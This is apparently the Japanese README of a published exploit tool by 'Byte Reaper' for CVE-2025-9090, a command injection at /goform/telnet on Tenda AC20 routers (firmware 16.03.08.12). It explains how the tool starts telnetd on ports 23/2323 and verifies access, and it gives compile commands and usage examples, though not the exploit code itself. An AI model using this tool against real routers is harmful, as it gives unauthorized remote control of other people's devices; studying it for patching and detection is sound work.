
Tenda AC20 16.03.08.12 におけるコマンドインジェクション (/goform/telnet)
作者: Byte Reaper
このエクスプロイトは、Tenda AC20 (v16.03.08.12) ルーターにおけるコマンドインジェクション脆弱性 CVE-2025-9090 を標的としています。
この欠陥はエンドポイント /goform/telnet に存在し、リモートからトリガー可能です。
アクセスされると、デバイス上でTelnetサービスが起動し、リモート操作用にポート 23/2323 が開放されます。
このプログラムは脆弱なエンドポイントにリクエストを送信し、レスポンス文字列 "load telnetd success" を確認した後、Telnetサービスへの接続を試みてエクスプロイトの成功を確認します。
gcc を使用してコンパイル:
gcc exploit.c argparse.c -o CVE-2025-9090 -lcurl
-h, --help このヘルプメッセージを表示して終了
-i, --ip ターゲットIPを入力
-c, --cookies クッキーファイルを入力
-v, --verbose 詳細モード
-f, --loop= リクエスト数
./CVE-2025-9090 -i <IP>
- 詳細モード :
./CVE-2025-9090 -i <IP> -v
- リクエスト数 :
./CVE-2025-9090 -i <IP> -v -f 5 (5回POSTエンドポイントに送信)
- クッキーファイル :
./CVE-2025-9090 -i <IP> -v -f 5 -c [ファイル名]
MIT